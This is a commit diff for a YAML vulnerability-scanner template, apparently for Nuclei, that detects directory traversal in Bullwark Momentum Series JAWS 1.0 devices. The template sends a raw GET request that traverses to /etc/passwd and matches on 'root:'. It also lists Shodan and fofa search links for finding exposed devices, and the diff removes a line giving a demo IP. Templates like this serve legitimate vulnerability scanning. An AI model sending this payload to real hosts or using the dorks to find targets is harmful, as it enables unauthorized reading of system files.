Update bullwark-momentum-series-directory-traversal.yaml
parent
67f72d11e6
commit
450df94e3d
|
@ -1,4 +1,4 @@
|
|||
id: Bullwark Momentum Series
|
||||
id: bullwark-momentum-directory-traversal
|
||||
|
||||
info:
|
||||
name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
|
||||
|
@ -11,27 +11,22 @@ info:
|
|||
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
|
||||
# Shodan Dork: https://www.shodan.io/search?query=Bullwark&page=1
|
||||
# fofa dork:-https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
|
||||
# Test demo:-http://78.186.157.88:5001
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | #Default Port
|
||||
GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}:5001
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: {{Hostname}}:5001/
|
||||
- | #Requests Port
|
||||
- |
|
||||
GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
word:
|
||||
- "root:"
|
||||
|
|
Loading…
Reference in New Issue